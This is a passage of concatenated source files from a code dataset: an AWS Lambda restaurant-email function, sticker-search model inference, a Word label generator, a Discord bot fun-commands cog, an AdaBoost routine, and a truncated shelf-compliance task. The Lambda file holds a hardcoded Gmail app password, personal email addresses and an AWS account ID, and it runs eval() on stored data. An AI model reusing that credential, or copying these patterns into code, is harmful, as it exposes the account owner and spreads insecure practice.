print(\"in db_query\")\n    dynamodb = boto3.resource('dynamodb')\n    table = dynamodb.Table('restaurants')\n    #print(os_resp['hits']['hits'])\n    for each_data in os_resp['hits']['hits']:\n        # print(each_data)\n        # print(\"\\n\")\n        restaurant_id = each_data['_source']['restaurantId']\n        print(restaurant_id)\n        cuisine = each_data['_source']['cuisine']\n        response = table.query(KeyConditionExpression= Key('id').eq(restaurant_id))\n        print(response['Items'])\n        #items.append(response['Items'][0])\n        return (response['Items'][0])\n        #print(\"\\n\")\n    #print(items)\n    #return items\n    \ndef delete_sqs_message(queueUrl, receipt_handle):\n    sqs_client = boto3.client(\"sqs\", 
region_name=\"us-east-1\")\n sqs_client.delete_message(QueueUrl=queueUrl, ReceiptHandle=receipt_handle)\n print('Message deleted')\n \ndef get_message_from_sqs():\n queueUrl = 'https://sqs.us-east-1.amazonaws.com/040944046258/DiningRecommendatio.fifo'\n now = datetime.now()\n current_time = now.strftime(\"%S\")\n sqs_client = boto3.client(\"sqs\", region_name=\"us-east-1\")\n #queue = sqs_client.Queue('https://sqs.us-east-1.amazonaws.com/040944046258/DiningRecommendatio.fifo')\n response = sqs_client.receive_message(\n QueueUrl = queueUrl,\n ReceiveRequestAttemptId=current_time\n )\n print(response)\n print(response['Messages'][0]['Body'])\n delete_sqs_message(queueUrl, response['Messages'][0]['ReceiptHandle'])\n return response['Messages'][0]['Body']\n #return response['Messages'][0]['Body']\n \ndef store_exisiting_recommendation(content):\n print(\"storing existing recommendation\")\n dyno_db_recommend = boto3.resource('dynamodb')\n table = dyno_db_recommend.Table('recommendation')\n table.put_item(Item = {\n 'sessionId': \"1\",\n 'cuisine':content\n })\n \ndef send_email_through_ses(to_emailId, mail_body):\n SENDER = \"violetorigin1999@gmail.com\"\n RECIPIENT = to_emailId\n AWS_REGION = \"us-east-1\"\n client = boto3.client('ses',region_name=AWS_REGION)\n response = client.send_email(\n Destination={'ToAddresses': [RECIPIENT,]},\n Message={\n 'Body': {'Text': {'Data': mail_body}},\n 'Subject': {'Data': \"Restaurant Suggestions\"},\n },\n Source=SENDER\n )\n print(\"Email sent! Message ID:\", ), print(response['MessageId'])\n store_exisiting_recommendation(mail_body)\n \n # try:\n \n # except ClientError as e:\n # print(e.response['Error']['Message'])\n # else:\n # print(\"Email sent! Message ID:\", ),\n # print(response['MessageId'])\n\n# def send_email(mail_body, to_emailId):\n# gmail_user = \"violetorigin1999@gmail.com\"\n# gmail_app_password = \"qcuktepgtxuayjln\"\n# sent_from = gmail_user\n# sent_to = to_emailId # have to change this\n# sent_subject = \"Hello World\"\n# sent_body = \"Its me World\"\n \n# try:\n# msg = MIMEText(mail_body)\n# msg['Subject'] = sent_subject\n# msg['From'] = sent_from\n# msg['To'] = ','.join(sent_to)\n# smtp_server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n# smtp_server.login(gmail_user, gmail_app_password)\n# smtp_server.sendmail(sent_from, sent_to, msg.as_string())\n# smtp_server.quit()\n# except Exception as exception:\n# print(\"Error: %s!\\n\\n\" % exception)\n\ndef lambda_handler(event, context):\n \n user_resp = get_message_from_sqs()\n print(\"user resp\", user_resp, type(user_resp))\n resp_dict = json.loads(user_resp)\n print(\"resp dict\", resp_dict['Cuisine'], type(resp_dict))\n client = os_connection_setup()\n resp = os_search_query(resp_dict['Cuisine'], client)\n #resp = os_search_query(\"Chinese\", client)\n print(resp, type(resp))\n \n rest_result = db_query(resp)\n #print(rest_result['location'], type(rest_result['location']))\n rest_location_dict = eval(rest_result['location'].replace(\"'\", \"\\\"\")) \n #print(type(rest_location_dict), rest_location_dict)\n #print(\" \".join(rest_location_dict['display_address']))\n mail_body = \"\"\n mail_body += rest_result['name'] + \"\\n\"+ rest_result['cuisine'] +\"\\n\"+ \" \".join(rest_location_dict['display_address']) + \" \\n\"+rest_result['phone']\n\n print(mail_body)\n send_email_through_ses(\"sakthiumamaheswari@gmail.com\", mail_body)\n\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n","repo_name":"sakthiuma/cloud_hw1","sub_path":"lambda 
function/sqs_opensearch_dynamodb_hw1-816a14f8-0046-4c70-a0e2-90d516c686b7/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15365128258","text":"import torch\nfrom utils.gen_data import StickerDataset, StickerDatasetTriplet\nfrom utils import process_image\nfrom torch.utils.data import DataLoader\nimport torchvision\nfrom torchvision.models.feature_extraction import get_graph_node_names, create_feature_extractor\nfrom models import cnn\nimport numpy as np\nimport cv2\nfrom torch.utils.mobile_optimizer import optimize_for_mobile\n\nbatch_size = 1\n# input_size = 64\ninput_size = 128\n# input_size = 224\ndevice = \"cuda\"\n\n# testing_data = StickerDataset(img_dir_list=[\"dataset/stickers_png/batch_2_cleaned/\"], input_size=input_size, augmentation=True)\n# testing_data = StickerDataset(img_dir_list=[\"dataset/stickers_png/batch_1_cleaned/\"], input_size=input_size, augmentation=True)\ntesting_data = StickerDatasetTriplet(img_dir_list=[\"dataset/stickers_png/batch_2/\"], input_size=input_size, augment=False)\ntesting_dataloader = DataLoader(testing_data, batch_size=batch_size, shuffle=False)\nmax_label = testing_data.max_label()\ncustom_testing_data = StickerDataset(img_dir_list=[\"dataset/realworld/\"], input_size=input_size, augmentation=False)\ncustom_testing_dataloader = DataLoader(custom_testing_data, batch_size=batch_size, shuffle=False)\n\ndef test_imgs():\n ckpt_path = \"\"\n # ckpt_path = \"outputs/checkpoints/features_202205311834.pt\" # best pre bg fix\n # ckpt_path = \"outputs/checkpoints/features_202206010056.pt\" # best post bg fix\n # ckpt_path = \"outputs/checkpoints/features_202206010154.pt\" # best post aug\n # ckpt_path = \"outputs/checkpoints/features_202206010244.pt\" # best post cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206010329.pt\" # convnext + aug\n # ckpt_path = \"outputs/checkpoints/features_202206192200.pt\" # best tri cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206192243.pt\" # best tri2 cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206230039.pt\" # best tri3 cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206231757.pt\" # best tri_pariwise1 cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206280113.pt\" # cnn2 triplet pairwise mimic\n # ckpt_path = \"outputs/checkpoints/features_202206280114.pt\" # convnext triplet pairwise mimic\n # ckpt_path = \"outputs/checkpoints/features_202206282334.pt\" # cnn2 triplet pairwise mimic + warp aug\n # ckpt_path = \"outputs/checkpoints/features_202206282339.pt\" # convnext triplet pairwise mimic + warp aug\n ckpt_path = \"outputs/checkpoints/features_202206300021a.pt\" # cnn2 triplet pairwise mimic + elastic aug\n # ckpt_path = \"outputs/checkpoints/features_202206300018a.pt\" # convnext triplet pairwise mimic + elastic aug\n # ckpt_path = \"outputs/checkpoints/features_202206300021b.pt\" # cnn2 triplet pairwise mimic + elastic aug B\n # ckpt_path = \"outputs/checkpoints/features_202206300018b.pt\" # convnext triplet pairwise mimic + elastic aug B\n \n \n # labels = 117\n # labels = 154\n labels = 271\n \n # model = cnn.cnn1(labels = labels)\n # model = cnn.cnn2(labels = labels)\n model = cnn.cnn2_deploy()\n # model = torchvision.models.convnext_small(pretrained=False, num_classes=labels)\n # model._modules[\"features\"][0][0] = torch.nn.Conv2d(1, 96, kernel_size=(4, 4), stride=(4, 4))\n 
model.load_state_dict(torch.load(ckpt_path, map_location=torch.device(device)))\n model.to(device)\n model.eval()\n\n # train_nodes, eval_nodes = get_graph_node_names(model)\n # print(train_nodes)\n # exit()\n\n feature_out = create_feature_extractor(model, {'fc2':\"features_layer\"})\n # feature_out = create_feature_extractor(model, {'classifier.2':'features_layer'})\n cos = torch.nn.CosineSimilarity(dim=1)\n\n features_list = []\n label_to_path_dict = dict()\n for (test_data, _, _, test_label, _, test_data_path) in testing_dataloader:\n test_data = test_data.to(device)\n test_data = torch.repeat_interleave(test_data, 3, 1)\n # print(test_data.shape)\n # exit()\n \n # traced_script_module = torch.jit.trace(model, test_data)\n # traced_script_module_optimized = optimize_for_mobile(traced_script_module)\n # traced_script_module_optimized._save_for_lite_interpreter(\"models/mobile_model.ptl\")\n # exit()\n\n # test classification accuracy, only for training dataset\n # logits = model(test_data)\n # pred_probs = torch.nn.Softmax(dim=1)(logits)\n # y_pred = pred_probs.argmax(1)\n # print(y_pred == test_labels)\n\n features = feature_out(test_data)['features_layer']\n features_list.append(features.detach())\n label_to_path_dict[str(test_label.item())] = test_data_path[0]\n features_arr = torch.cat(features_list, 0)\n # features_arr_np = features_arr.cpu().detach().numpy()\n # print(features_arr_np.shape)\n # features_arr_np = features_arr_np.astype(\">f2\")\n # features_arr_np.tofile(\"models/features_db.bin\")\n # exit()\n\n cos_n_correct = 0\n dist_n_correct = 0\n cos_top5_n_correct = 0\n dists_top5_n_correct = 0\n for (_, test_data, _, test_label, _, _) in testing_dataloader:\n # temp = test_data[0][0].detach().numpy()\n # temp = (temp*255.0).astype(np.uint8)\n # process_image.preview_img(temp)\n # exit()\n test_data = test_data.to(device)\n test_label = test_label.to(device)\n features = feature_out(test_data)['features_layer']\n features = features.detach()\n\n cos_sim = cos(features, features_arr)\n dist = torch.sum(torch.sub(features, features_arr) ** 2, dim=1)\n # print(dist[0])\n\n cos_preds = torch.argsort(cos_sim, descending=True)[:5]\n dist_preds = torch.argsort(dist, descending=False)[:5]\n\n cos_n_correct += (test_label == cos_preds[0])\n dist_n_correct += (test_label == dist_preds[0])\n cos_top5_n_correct += (test_label in cos_preds)\n dists_top5_n_correct += (test_label in dist_preds)\n cos_acc = (cos_n_correct/len(testing_data)).item()\n dist_acc = (dist_n_correct/len(testing_data)).item()\n cos_top5_acc = cos_top5_n_correct/len(testing_data)\n dist_top5_acc = dists_top5_n_correct/len(testing_data)\n print(cos_acc)\n print(dist_acc)\n print(cos_top5_acc)\n print(dist_top5_acc)\n\n \n for (test_data, _, test_data_path) in custom_testing_dataloader:\n test_data = test_data.to(device)\n features = feature_out(test_data)['features_layer']\n features = features.detach()\n\n cos_sim = cos(features, features_arr)\n dist = torch.sum(torch.sub(features, features_arr) ** 2, dim=1)\n\n cos_preds = torch.argsort(cos_sim, descending=True)[:5]\n dist_preds = torch.argsort(dist, descending=False)[:5]\n\n print(test_data_path)\n print(cos_preds)\n print(dist_preds)\n\n return\n\ntest_imgs()","repo_name":"arawndinog/stickersearch","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10103289269","text":"import os\nimport sys\nimport pandas as 
pd\n\ninput('Press Enter to exit...')\ndef app_path():\n    if hasattr(sys, 'frozen'):\n        return os.path.dirname(sys.executable) # exe directory after packaging with pyinstaller\n    return os.path.dirname(__file__) # py directory before packaging\n\n\nimport winreg\ndef desktop_path():\n    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n                         r'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders')\n    desktop = winreg.QueryValueEx(key, \"Desktop\")[0]\n    print(desktop)\n    return desktop\n\nfrom docx import Document\ndef delete_paragraph(paragraph):\n    p = paragraph._element\n    p.getparent().remove(p)\n    p._p = p._element = None\ndesktop_path = desktop_path()\ndoc = Document(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标模板.docx\")\ndf = pd.read_excel(desktop_path + \"\\日本海外仓箱标\\需生成的数据文件.xlsx\")\ndf_data = pd.DataFrame()\nfor i in df.index:\n    xiangshu = int(df.loc[i, \"箱数\"])\n    sku = df.loc[i, \"品名\"]\n    num = int(df.loc[i, \"单箱数量\"])\n    zimu = df.loc[i, \"字母标签\"]\n    code = df.loc[i, \"箱子编号\"]\n    if xiangshu > 1:\n        df_tmp = pd.DataFrame({\"品名\": sku, \"箱子编号\": code, '字母标签': zimu, \"单箱数量\": num}, index=[0])\n        for n in range(0, xiangshu):\n            df_data = df_data.append(df_tmp)\n    else:\n        df_tmp = pd.DataFrame({\"品名\": sku, \"箱子编号\": code, '字母标签': zimu, \"单箱数量\": num}, index=[0])\n        df_data = df_data.append(df_tmp)\n\ndf_data = df_data.reset_index()\nsku_list = df_data['品名'].tolist()\nnum_list = df_data['单箱数量'].tolist()\nzimu_list = df_data['字母标签'].tolist()\ncode_list = df_data['箱子编号'].tolist()\nlist1 = doc.paragraphs\nfor i in list1:\n    delete_paragraph(i)\n    if (len(doc.paragraphs)) == len(sku_list):\n        break\n\ndoc.save(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\ndoc = Document(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\nchildren = doc.element.body.iter()\ncount = 0 # count is kept to locate which text box we are in, since indexing by position failed\nfor child in children:\n    # detect text boxes by element tag\n    if child.tag.endswith('txbx'):\n        count += 1\n        if count == 3:\n            for ci in child.iter():\n                if ci.tag.endswith('main}r'):\n                    if ci.text == '型号:':\n                        ci.text = ''\n                    if ci.text == '字母区分:':\n                        ci.text = ''\n                    if ci.text == '数量:':\n                        ci.text = ''\n                    if ci.text == '箱子编号:':\n                        ci.text = ''\ndoc.save(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\ndoc = Document(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\nsku_dict = {}\nfor i in range(1, (len(sku_list) * 2) + 1):\n    if i == 1:\n        sku_dict[1] = 1\n    elif i % 2 == 0:\n        sku_dict[i] = sku_dict[i - 1]\n    else:\n        sku_dict[i] = sku_dict[i - 1] + 1\nm = 1\nn = 0\nchildren = doc.element.body.iter()\nfor child in children:\n    # detect text boxes by element tag\n    if child.tag.endswith('txbx'):\n        for ci in child.iter():\n            if ci.tag.endswith('main}r'):\n                if ci.text == '型号:':\n                    # print(ci.text)\n                    ci.text = \"型号:%s\" % sku_list[n]\n                if ci.text == '字母区分:':\n                    # print(ci.text)\n                    ci.text = \"字母区分:%s\" % zimu_list[n]\n                if ci.text == '数量:':\n                    # print(ci.text)\n                    ci.text = \"数量:%s\" % num_list[n]\n                if ci.text == '箱子编号:':\n                    # print(ci.text)\n                    ci.text = \"箱子编号:\\n%s\" % code_list[n]\n                    n += 1\n    print(\"Generating...\")\n\ndoc.save(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标生成完毕.docx\")\n\n\ninput('Press Enter to exit...')","repo_name":"asd851472957/djangoProject","sub_path":"djangoProject/xiangbiaotest.py","file_name":"xiangbiaotest.py","file_ext":"py","file_size_in_byte":4056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14410237438","text":"__author__ = \"Sairam\"\n\nimport json\nimport random\nimport re\nfrom typing import Optional\n\nimport discord\nimport wikipedia\nfrom discord.ext import commands\n\n\nclass Fun(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n    async def 
cog_check(self, ctx):\n if ctx.channel.type == discord.ChannelType.private:\n return True\n if await self.bot.is_owner(ctx.author):\n return True\n guild_data = json.load(open(self.bot.guilds_json))\n enabled = guild_data[str(ctx.guild.id)][\"enabled\"]\n if f\"Bot.cogs.{self.qualified_name}\" in enabled:\n return True\n return False\n\n @commands.command(name='99!', help='Gives a random brooklyn 99 quote!')\n async def _99(self, ctx: discord.ext.commands.context.Context):\n brooklyn_99_quotes = [\n 'I\'m the human form of the 💯 emoji.',\n 'Bingpot!',\n (\n 'Cool. Cool cool cool cool cool cool cool, '\n 'no doubt no doubt no doubt no doubt.'\n )\n ]\n response = random.choice(brooklyn_99_quotes)\n await ctx.send(response)\n\n @commands.command(name='8ball', help='Answers your questions! ;)')\n async def _8ball(self, ctx: discord.ext.commands.context.Context, *, question):\n replies = [\n \"As I see it, yes.\",\n \"Ask again later.\",\n \"Better not tell you now.\",\n \"Cannot predict now.\",\n \"Concentrate and ask again.\",\n \"Don’t count on it.\",\n \"It is certain.\",\n \"It is decidedly so.\",\n \"Most likely.\",\n \"My reply is no.\",\n \"My sources say no.\",\n \"Outlook not so good.\",\n \"Outlook good.\",\n \"Reply hazy, try again.\",\n \"Signs point to yes.\",\n \"Very doubtful.\",\n \"Without a doubt.\",\n \"Yes.\",\n \"Yes – definitely.\",\n \"You may rely on it.\"\n ]\n await ctx.send(\n f'Question: {question}\\n'\n f'Answer: {random.choice(replies)}'\n )\n\n @commands.command(aliases=['announce'], usage='[content]')\n async def say(self, ctx, channel: Optional[discord.TextChannel] = None, *, message: str = None):\n \"\"\"Say a message\"\"\"\n channel = ctx.channel if channel is None else channel\n emojis = re.findall(r':(.*?):', str(message))\n new_msg = str(message)\n for a in emojis:\n rep = f\":{a}:\"\n emoji = discord.utils.get(ctx.guild.emojis, name=a)\n if emoji is not None:\n if emoji.animated:\n new_msg = (new_msg.replace(rep, f\"<a:\\_:{emoji.id}>\"))\n else:\n new_msg = (new_msg.replace(rep, f\"<:\\_:{emoji.id}>\"))\n else:\n continue\n await channel.send(new_msg)\n await ctx.message.delete()\n\n # @say.error\n # async def error_say(self, ctx, error):\n # \tif isinstance(error, discord.HTTPException):\n # \t\tawait ctx.send(f\"Message is not filled. Please send the message to be sent. 
{ctx.author.mention}\")\n\n @commands.command(name='spaceit!', help=\"Add a space between each letter!\")\n async def space_it(self, ctx: commands.Context, *, message: str):\n await ctx.send(\" \".join(message))\n\n @commands.command(name='randomizecase', help=\"Randomizes each letter into capital or small\", aliases=['randomcase', 'caserandom'])\n async def randomize_case(self, ctx: commands.Context, *, message: str):\n await ctx.send(\"\".join(random.choice((str1.upper(), str1.lower())) for str1 in message))\n\n @commands.command(name='flipthecoin!', help=\"Flips the coin!\", aliases=['flip', 'coinflip'])\n async def flip_the_coin(self, ctx: commands.Context):\n await ctx.send(f\"You got {str(random.choice(('Head', 'Tail'))).lower()}\")\n\n @commands.command(name='voter!', help='Helps you to decide anything!', aliases=['vote', 'voteforme'])\n async def voter(self, ctx: commands.Context, *, messages: str):\n await ctx.send(\n f\"Answer: {random.choice(messages.split(','))}\"\n )\n\n @commands.command(name=\"wikipedia\", help=\"Gives you the page in wikipedia\", hidden=True)\n async def wikipedia(self, ctx, search):\n result = wikipedia.search(search, results=1)\n page = wikipedia.page(result)\n await ctx.send(page)\n\n @commands.command(name=\"urban (WIP or Not Implemented)\", help=\"Give you the page from urban dictionary\", hidden=True)\n async def urban(self, search):\n pass\n\n @commands.command(help=\"Says what you sent using tts!\")\n async def echo(self, ctx, channel: Optional[discord.TextChannel] = None, *, message=None):\n if message is not None:\n if channel is None:\n await ctx.send(message, tts=True)\n else:\n await channel.send(message, tts=True)\n await ctx.send(\"Message sent\")\n else:\n await ctx.send(f\"Message is not filled. Please send the message to be sent. 
{ctx.author.mention}\")\n\n @commands.group(name=\"convert_to\", help=\"Converts a given string into a subcommand formatted string\")\n async def _convert_to(self, ctx: commands.Context):\n pass\n\n @_convert_to.command(help=\"Gives you up-side down text!\")\n async def up_down(self, ctx, *, string: str):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\\\;',./\"\n output_table = \"\".join(reversed(list(\"/˙',؛\\[]¿<>„:|{}+‾()*&^%$#@¡~0987654321ZʎXMΛ∩⊥SᴚὉԀONW˥ʞſIHƃℲƎᗡϽq∀zʎxʍʌnʇsɹbdouɯןʞɾıɥƃɟǝpɔqɐ\")))\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n output_reverse = \"\".join(reversed(list(output_string)))\n await ctx.send(output_reverse)\n\n @_convert_to.command(help=\"Gives you the reversed string!\")\n async def reverse(self, ctx, *, string: str):\n output_reverse = \"\".join(reversed(list(string)))\n await ctx.send(output_reverse)\n\n @_convert_to.command(help=\"Gives you a formatted Small-Caps\")\n async def small_caps(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a vapour-waved string\")\n async def vapour_wave(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:"<>?[]\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a monospaced string\")\n async def monospace(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"𝚊𝚋𝚌𝚍𝚎𝚏𝚐𝚑𝚒𝚓𝚔𝚕𝚖𝚗𝚘𝚙𝚚𝚛𝚜𝚝𝚞𝚟𝚠𝚡𝚢𝚣𝙰𝙱𝙲𝙳𝙴𝙵𝙶𝙷𝙸𝙹𝙺𝙻𝙼𝙽𝙾𝙿𝚀𝚁𝚂𝚃𝚄𝚅𝚆𝚇𝚈𝚉𝟷𝟸𝟹𝟺𝟻𝟼𝟽𝟾𝟿0~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a formatted string with cursive!\")\n async def cursive_script(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a currency styled a format!\")\n async def currency_styled_text(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"₳฿₵ĐɆ₣₲ⱧłJ₭Ⱡ₥₦Ø₱QⱤ₴₮ɄV₩ӾɎⱫ₳฿₵ĐɆ₣₲ⱧłJ₭Ⱡ₥₦Ø₱QⱤ₴₮ɄV₩ӾɎⱫ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a formatted old_english_styled string!\")\n async def 
old_english_style(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","repo_name":"SaiponathGames/OpenCityBot","sub_path":"Bot/cogs/Fun.py","file_name":"Fun.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7274159774","text":"# adaboost.py\r\n\r\n# !/usr/bin/python \r\n\r\nimport numpy as np\r\n\r\nimport math\r\n \r\n\r\n# labels: nx1 array; 1 if example is instance of improvement, -1 if not\r\n# predictions: nxm array; 1 if feature m was active for example n, -1 if not\r\n# T: number of rounds (ie, number of features to be chosen)\r\n# returns features: 1xT array of chosen feature indices\r\ndef boost(predictions, labels, T=0):\r\n \r\n n = labels.size\r\n m = predictions.shape[1]\r\n if T == 0:\r\n T = (m + 2 - 1) // 2\r\n\r\n features = np.zeros(T, dtype=int)\r\n\r\n alpha = np.zeros(T, float)\r\n\r\n # margin matrix: a negative entry means feature m made a mistake on input n\r\n errors = np.zeros((n, m))\r\n for i in range(n):\r\n errors[i,:] = labels[i] * predictions[i,:]\r\n\r\n # reusable storage\r\n temp = np.zeros(m)\r\n\r\n # initialize distribution over examples\r\n D = np.ones(n)\r\n D = D / D.sum()\r\n\r\n used = []\r\n for t in range(T):\r\n \r\n # choose the best feature\r\n for i in range(m):\r\n if i in used:\r\n temp[i] = np.inf # disallow features to be chosen twice\r\n else:\r\n temp[i] = (D * (errors[:,i] < 0)).sum()\r\n used.append(temp.argmin())\r\n err, features[t] = temp.min(), temp.argmin()\r\n\r\n # update alpha and D\r\n alpha[t] = 0.5 * math.log((1 - err) / err)\r\n the_exp = np.exp(-(alpha[t]) * errors[:,features[t]])\r\n D = D * the_exp\r\n D = D / D.sum()\r\n\r\n return features.astype(int)\r\n \r\n \r\n","repo_name":"AlexeyMK/senior_design","sub_path":"adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6393343418","text":"from app import celery\nfrom celery.utils.log import get_task_logger\n\nfrom bridge.bridge_manager import BridgeManager\nfrom models.modelDetail import AiModelDetail\nfrom models.receiveJobs import ReceiveJobs\nfrom models.category import Category\nfrom models.subcategory import SubCategory\nfrom models.compliance import ShelfCompliance\nfrom utilities.category_Detail import CategoryDetail\nfrom utilities.category_Response import CategoryResponse\nfrom utilities.brand_Response import BrandResponse\nfrom utilities.complex_encoder import ComplexEncoder\nfrom utilities.rectangle2 import Rectangle2\nfrom utilities.point import Point\nfrom utilities.geometery_operation import is_point_within_dist_of_rect\nfrom utilities.geometery_operation import rectangle_contain\nfrom utilities.compliance_meta import ComplianceMetaData\n\nfrom utilities.constant import JOB_STATUS_DONE, JOB_STATUS_ERROR, JOB_STATUS_INSERTED, JOB_STATUS_PENDING, JOB_STATUS_COMMUNICATION_ERROR\n\nfrom utilities.common import get_url\nimport requests\nimport json\n\n\nlogger = get_task_logger(__name__)\n\ndef build_shelf_compliance(model_response_json, 
shelf_compliance): \n # collection of brand with coordinates\n # sample data formate\n # [item_or_brand_name, x, y, h, w]\n \n brand_tags_xy_data = model_response_json[\"MetaData\"] \n print_debug_detail(f\"{brand_tags_xy_data}\")\n compliance_collection = []\n shelf_coordinate_object = None\n for each_shelf in shelf_compliance: \n compliance_items = each_shelf.complianceItem.split(\",\")\n print_debug_info(f\"Shelf Name and Tag:- {each_shelf.shelfName, each_shelf.shelfTag}\")\n #get main shelf coordinate detail\n for single_item_coordinate in brand_tags_xy_data: \n if single_item_coordinate[0] == each_shelf.shelfTag:\n print_debug_info(f\"Actual Shelf Name is:- {single_item_coordinate[0]}\")\n shelf_coordinate_object = single_item_coordinate\n break\n \n print_debug_detail(f\"Shelf object -> {shelf_coordinate_object}\")\n if shelf_coordinate_object is not None:\n\n #creat shelf Rectangle object\n #logger.info(f\"{shelf_coordinate_object[2]} {float(shelf_coordinate_object[2]+10)}\")\n\n shelf_rectangle = Rectangle2(shelf_coordinate_object[1]-1,float(shelf_coordinate_object[2]-1),shelf_coordinate_object[3],shelf_coordinate_object[4])\n \n #logger.info(f\"finding shelf rectangle {shelf_rectangle.x,shelf_rectangle.y,shelf_rectangle.w,shelf_rectangle.h}\")\n \n find_item_inside_shelf = []\n #using loop searh compliance item in the shelf\n for each_item_coordinate in brand_tags_xy_data:\n predicted_item_name = each_item_coordinate[0]\n\n print_debug_info(f\"Inner item Name:- {predicted_item_name}\")\n\n #creat searchable item Rectangle object\n #find_rectangle = Rectangle(each_item_coordinate[1],each_item_coordinate[2],each_item_coordinate[3],each_item_coordinate[4]) \n #logger.info(f\"item object coordinate -> {find_rectangle.x,find_rectangle.y,find_rectangle.w,find_rectangle.h}\")\n\n item_xy_point = Point(each_item_coordinate[1], each_item_coordinate[2])\n print_debug_detail(f\"Inner item x,y value {each_item_coordinate[1]}, {each_item_coordinate[2]}\")\n \n #perform search\n is_rect_inside = is_point_within_dist_of_rect(shelf_rectangle, item_xy_point, dist=1) \n print_debug_detail(f\"Item found inside:- {is_rect_inside}\")\n if is_rect_inside:\n find_item_inside_shelf.append(predicted_item_name)\n \n print_debug_info(f\"Inside item found length: 